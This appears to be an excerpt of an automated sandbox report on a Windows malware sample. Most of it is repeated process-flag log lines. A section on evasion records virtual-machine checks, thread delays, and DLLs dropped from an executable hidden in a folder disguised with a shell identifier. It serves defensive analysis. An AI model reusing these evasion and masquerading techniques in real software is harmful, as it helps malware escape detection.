Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,29_2_00007FFB22737694
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB22706078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB2273B648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB22762738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23AB3058
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23AD4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,29_2_00007FFB23B01D98
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5505Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4302Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8228Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1286Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7002Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2690Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 1401
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeWindow / User API: threadDelayed 6871
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\UEptccWaJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\x8eec9dQJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\VPIOcgIOJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\e5xaOqBzJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\nHqxqt5LJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\TLbqzKsWJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\miECvZvTJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\T9229YlCJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllJump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeDropped PE file which has not been started: C:\Windows\Temp\fQQIqQM0Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_29-59834
